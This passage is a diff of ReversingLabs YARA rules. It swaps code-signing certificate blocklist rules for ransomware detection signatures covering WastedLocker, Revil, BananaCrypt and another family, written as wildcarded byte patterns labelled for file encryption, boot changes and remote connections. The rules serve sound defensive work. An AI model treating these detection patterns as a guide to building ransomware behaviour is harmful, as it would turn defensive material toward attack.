2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 12 ?? + 12 ?? 28 ?? ?? ?? ?? 12 ?? 12 ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 59 13 ?? 72 ?? ?? ?? ?? 11 + ?? 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 2C ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 2B ?? 2A + } + $encrypt_files_p2 = { + 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 02 16 12 ?? 28 + ?? ?? ?? ?? 26 08 7B ?? ?? ?? ?? 0D 08 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 35 ?? 08 7B ?? ?? + ?? ?? 16 36 ?? DD ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 10 ?? 03 03 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? + 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 03 6F ?? ?? ?? ?? 16 11 ?? 16 1F ?? 28 ?? ?? ?? ?? 03 + 6F ?? ?? ?? ?? 16 11 ?? 1F ?? 1F ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 1F ?? 6A + 13 ?? 17 13 ?? 09 6E 13 ?? 2B ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 59 13 ?? 11 ?? 11 ?? 30 + ?? 02 19 17 7E ?? ?? ?? ?? 19 20 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 09 20 ?? + ?? ?? ?? 58 14 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? + 06 1F ?? 16 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? + DD ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 16 13 ?? 16 13 ?? 2B ?? 11 ?? 20 ?? ?? ?? ?? 2F + ?? 09 6E 11 ?? 6A 59 13 ?? 11 ?? D4 8D ?? ?? ?? ?? 13 ?? 11 ?? 17 58 11 ?? 33 ?? 11 ?? + D4 8D ?? ?? ?? ?? 13 ?? 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 8E 69 28 ?? ?? ?? ?? 11 + ?? 18 5D 2D ?? 11 ?? 8E 69 1F ?? 33 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 07 11 + ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 11 ?? 11 ?? 8E 69 58 13 ?? 11 ?? 17 58 13 + ?? 11 ?? 11 ?? 3F ?? ?? ?? ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 16 07 09 28 ?? ?? ?? ?? + 11 ?? 8E 69 28 ?? ?? ?? ?? 2B ?? 11 ?? 16 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? + ?? ?? DE ?? 26 DE ?? 26 DE ?? 00 07 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 00 06 28 ?? ?? ?? + ?? 26 DE ?? 26 DE ?? DC 2A + } + $find_files = { + 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 2C ?? 2A 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? + ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 14 0B 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B DE ?? 26 + DE ?? 07 2C ?? 07 8E 16 FE 01 2B ?? 17 0C 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13 + ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 08 2C ?? 11 ?? 7B ?? + ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? + 26 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 08 2C ?? DD ?? ?? ?? ?? 28 + ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17 + 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 07 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ?? + ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? + 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? ?? ?? ?? 11 ?? FE 06 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 11 ?? 7B ?? ?? ?? ?? 09 28 ?? ?? ?? ?? DE + ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 09 6F ?? ?? ?? ?? DE ?? 26 DE + ?? DE ?? 26 DE ?? 2A + } + $change_boot = { + 02 8E 2C ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 02 16 9A 72 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 16 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 2C ?? 17 80 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 28 ?? + ?? ?? ?? 2A 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A 28 ?? ?? ?? ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Technical and Commercial Consulting Pvt. Ltd." and pe.signatures[i].serial=="4b:f1:d6:8e:92:6e:2d:d8:96:60:08:c4:4f:95:ea:1c" and 1322092799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($change_boot) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_149C12083C145E28155510Cfc19Db0Fe : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Wastedlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects WastedLocker ransomware." author = "ReversingLabs" - id = "8d9b0b1c-df7c-560a-8d51-bc8738952457" - date = "2023-11-08" - modified = "2023-11-08" + id = "68090960-9878-5836-8caa-bf8f408a474e" + date = "2020-12-07" + modified = "2020-12-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2898-L2914" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f616fc470e223d65ac4c984394a38d566265ab37829ff566012de0a1527396c2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Wastedlocker.yara#L1-L86" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0899d3cc3bcea8eae60689a54f34e57bdc52088c879c8420b8e6d0b1969cb186" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WastedLocker" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 8B EC 83 EC ?? 83 65 ?? ?? 57 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 53 8B 5D ?? 8D 04 41 89 45 ?? + C7 00 ?? ?? ?? ?? 8B 43 ?? 57 51 89 45 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 0F 84 + ?? ?? ?? ?? 56 8D 47 ?? 66 83 38 ?? 75 ?? 0F B7 4F ?? 66 85 C9 0F 84 ?? ?? ?? ?? 66 + 83 F9 ?? 75 ?? 66 83 7F ?? ?? 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F0 + 8D 14 0E B8 ?? ?? ?? ?? 3B D0 89 55 ?? 0F 83 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ?? + 8B 45 ?? 85 C0 74 ?? 83 7F ?? ?? 75 ?? 39 47 ?? 0F 82 ?? ?? ?? ?? 8D 44 36 ?? 50 8D + 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 + E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 E8 + ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 03 C6 8D 44 00 ?? 83 C0 ?? 50 6A ?? FF + 35 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 6A + ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 8D 44 00 ?? 50 FF 75 ?? 8D 46 ?? 50 89 76 ?? 89 36 E8 + ?? ?? ?? ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 07 89 46 ?? 8B 47 ?? 89 46 ?? 8B + } + $find_files_p2 = { + 47 ?? 89 46 ?? 8B 47 ?? 89 46 ?? 8B 47 ?? 83 C4 ?? 89 46 ?? 83 3B ?? 74 ?? 53 FF 15 + ?? ?? ?? ?? 8D 43 ?? 8B 48 ?? 89 06 89 4E ?? 89 31 89 70 ?? FF 43 ?? 83 7B ?? ?? 74 + ?? 8B 43 ?? 83 F8 ?? 75 ?? FF 73 ?? FF 15 ?? ?? ?? ?? 83 3B ?? 0F 84 ?? ?? ?? ?? 53 + FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? F6 45 ?? ?? 74 ?? 8D 4C 0E ?? 3B + C8 73 ?? 8D 04 36 50 8D 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 8D 04 41 + 66 83 60 ?? ?? 83 C4 ?? 83 7D ?? ?? 66 C7 00 ?? ?? 74 ?? 83 C1 ?? 51 8B 4D ?? E8 ?? + ?? ?? ?? 85 C0 75 ?? 8B 4D ?? FF 75 ?? 8B 45 ?? 53 FF 75 ?? 8D 44 06 ?? FF 75 ?? 50 + 51 E8 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? F6 45 ?? ?? + 74 ?? 83 65 ?? ?? 83 7D ?? ?? 75 ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 43 + ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5B EB + ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 5F C9 C2 + } + $encrypt_files_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 8B 3D ?? ?? ?? ?? FF 75 ?? FF D7 85 C0 + 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 75 ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? F6 C3 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? + ?? ?? ?? 85 C0 75 ?? 33 DB 85 DB 89 5D ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? + ?? ?? ?? 89 45 ?? EB ?? 83 65 ?? ?? 33 C9 39 4D ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 39 4D ?? 74 ?? 8B 45 ?? 8B 10 8B 40 ?? C1 65 ?? ?? 89 55 ?? 89 45 + ?? EB ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 4D ?? 8B 45 ?? 89 45 ?? 89 4D ?? 89 4D ?? + 8B 5D ?? 33 F6 8B 45 ?? 85 C0 89 45 ?? 74 ?? 3B D8 73 ?? 89 5D ?? 2B 45 ?? 89 45 ?? + 75 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 7D ?? 8D 45 ?? 50 57 8D 47 ?? 50 FF 75 + ?? 8B 45 ?? 03 C6 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 03 75 ?? 85 C0 89 45 ?? 0F + } + $encrypt_files_p2 = { + 85 ?? ?? ?? ?? 2B 5D ?? 75 ?? EB ?? 8B 7D ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 33 + C0 3B 45 ?? 77 ?? 72 ?? 3B 5D ?? 73 ?? 8B C3 EB ?? 8B 45 ?? 29 45 ?? 8B 4D ?? 83 5D + ?? ?? 0B 4D ?? 75 ?? 8B 4D ?? 89 4D ?? 03 F0 2B D8 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 4D + ?? 0F AC C8 ?? C1 E9 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? F7 E1 29 45 ?? 19 55 ?? 01 45 ?? + 11 55 ?? 83 7D ?? ?? 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 85 C0 89 45 ?? 0F 84 ?? ?? ?? ?? + 8B 7D ?? 8D 47 ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 74 ?? 83 7D ?? + ?? 74 ?? 8B 4D ?? 8B 45 ?? 8B D1 0B D0 74 ?? 0F AC C1 ?? C1 E8 ?? 83 4F ?? ?? 89 4F + ?? 89 75 ?? 39 75 ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 + 75 ?? 74 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 85 DB 0F 85 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 01 75 ?? 83 55 ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF + D7 EB ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 5F 5E 5B C9 C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3rd Eye Solutions Ltd" and pe.signatures[i].serial=="14:9c:12:08:3c:14:5e:28:15:55:10:cf:c1:9d:b0:fe" and 1209340799<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_77E0117E8B2B8Faa84Bed961019D5Ef8 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Revil : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Revil ransomware." author = "ReversingLabs" - id = "2733cc5b-bc1f-5ba9-a2f4-50f472fc288e" - date = "2023-11-08" - modified = "2023-11-08" + id = "67c2f49e-b9dc-5900-a89d-49ba41088ac3" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2916-L2932" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bea94b9da8c176f22a66fe7a4545dcc3a38f727a75a0bc7920d9aece8e24b9b7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Revil.yara#L1-L101" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "24a79477eb797d7a7121d1248ebbece833ccd256de55729ff96084135ce8d426" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Revil" + tc_detection_factor = 5 importance = 25 + strings: + $search_files = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 33 C0 57 8B 7D ?? 8B D8 50 56 89 45 ?? 89 + 5D ?? 89 45 ?? 89 45 ?? FF 57 ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 56 50 E8 ?? + ?? ?? ?? 53 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? E9 ?? ?? ?? ?? 8B 45 ?? + 0B 45 ?? 74 ?? FF 33 56 E8 ?? ?? ?? ?? 8B F3 8B 5B ?? 89 5D ?? FF 36 E8 ?? ?? ?? ?? + 56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 83 C0 ?? 89 45 ?? 83 D1 ?? 0B C1 89 4D + ?? 75 ?? 21 45 ?? 8B 75 ?? 33 C0 40 85 C0 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? + ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8D 04 46 50 E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 59 + 74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 57 ?? 83 C4 ?? 85 + C0 74 ?? 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 77 ?? FF 57 ?? 83 + C4 ?? 01 47 ?? 11 57 ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 50 89 45 ?? 8D 85 + ?? ?? ?? ?? 53 50 56 FF 57 ?? 83 C4 ?? 85 C0 74 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 53 50 + 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? 83 3F ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 + FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 5D + ?? 83 3F ?? 0F 84 ?? ?? ?? ?? EB ?? 8B F3 8B 5B ?? FF 36 E8 ?? ?? ?? ?? 56 E8 ?? ?? + ?? ?? 59 59 85 DB 75 ?? 5F 5E 5B 8B E5 5D C3 + } + $remote_connection = { + 55 8B EC 81 EC ?? ?? ?? ?? 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C0 66 89 85 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 56 56 56 56 50 FF 15 ?? ?? ?? ?? 8B F8 33 C0 89 7D ?? 85 FF 0F 84 ?? ?? + ?? ?? 66 89 45 ?? 33 C9 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 56 FF 75 ?? 41 89 75 ?? + 89 75 ?? 89 75 ?? 89 75 ?? 89 4D ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 + 4D ?? 89 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 33 C0 E9 + ?? ?? ?? ?? 8B 4D ?? 33 D2 8B 45 ?? 53 56 66 89 14 41 FF 75 ?? FF 75 ?? 57 FF 15 ?? + ?? ?? ?? 8B D8 89 5D ?? 85 DB 75 ?? 57 EB ?? 8B 45 ?? 66 39 30 75 ?? 6A ?? 59 66 89 + 08 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 + C0 83 7D ?? ?? B9 ?? ?? ?? ?? 66 89 45 ?? 0F 44 C1 0D ?? ?? ?? ?? 50 56 56 56 FF 75 + ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FE 50 6A ?? 6A ?? 68 ?? + ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 56 FF 75 ?? 8D 85 + ?? ?? ?? ?? FF 75 ?? FF 75 ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? + ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 53 FF 15 ?? ?? + ?? ?? 85 C0 6A ?? 58 0F 45 F8 85 FF 75 ?? 8B 45 ?? 56 53 89 30 FF 15 ?? ?? ?? ?? 8B + 7D ?? 85 C0 74 ?? 56 8D 45 ?? 89 75 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 68 ?? + ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 1B C0 23 45 ?? 89 01 3D ?? ?? ?? ?? 75 + ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 8B F0 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? + ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C6 5B 5F 5E 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 51 83 7D ?? ?? 53 56 57 BB ?? ?? ?? ?? 7F ?? 7C ?? 39 5D ?? 73 ?? 8B 5D ?? + 8B 7D ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 59 59 EB ?? E8 ?? ?? ?? ?? 83 F8 ?? + 75 ?? 6A ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 + F6 74 ?? 89 9E ?? ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? EB ?? 33 C0 EB ?? E8 ?? ?? + ?? ?? 8B 55 ?? 8B CA 4A 89 55 ?? 85 C9 74 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 83 + F8 ?? 74 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 56 E8 ?? + ?? ?? ?? 8B C6 59 5F 5E 5B 8B E5 5D C3 56 57 E8 ?? ?? ?? ?? 59 33 C0 EB + } + $enum_resources = { + 55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 + ?? 33 C0 E9 ?? ?? ?? ?? 83 4D ?? ?? B8 ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B + F8 59 85 FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 53 56 8D 45 ?? 50 57 8D 45 + ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 33 DB 39 5D ?? 76 ?? 8D 77 ?? + 83 7E ?? ?? 75 ?? FF 75 ?? FF 36 E8 ?? ?? ?? ?? 59 59 F6 46 ?? ?? 74 ?? 8D 46 ?? 50 + FF 75 ?? E8 ?? ?? ?? ?? 59 59 43 83 C6 ?? 3B 5D ?? 72 ?? 8B 45 ?? 3D ?? ?? ?? ?? 75 + ?? 57 E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 5E 1B C0 40 5B 5F 8B E5 5D + C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Reiner Wodey Informationssysteme" and pe.signatures[i].serial=="77:e0:11:7e:8b:2b:8f:aa:84:be:d9:61:01:9d:5e:f8" and 1383695999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_resources) and ($search_files) and ($encrypt_files) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4F3Feb4Baf377Aea90A463C5Dee63884 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Bananacrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BananaCrypt ransomware." author = "ReversingLabs" - id = "8de9bcf3-d705-590f-8898-52218f937571" - date = "2023-11-08" - modified = "2023-11-08" + id = "9e47d094-d7fc-57dd-826c-5321d0219273" + date = "2020-09-14" + modified = "2020-09-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2934-L2950" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "56c37e758db33aa40e9a2c1c5a4eb14c2c370f614e838d86bf20c64f79e2a746" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BananaCrypt.yara#L1-L103" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6bde4430e438947b0d7f10c4de11216929ec03af81b3d74f8b7bb8ed134d08d2" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BananaCrypt" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 55 ?? 89 8D ?? ?? ?? + ?? 85 D2 74 ?? 8B 45 ?? 85 C0 0F 85 ?? ?? ?? ?? 31 F6 0F B6 13 84 D2 0F 84 ?? ?? ?? + ?? 8D 43 ?? 88 95 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? 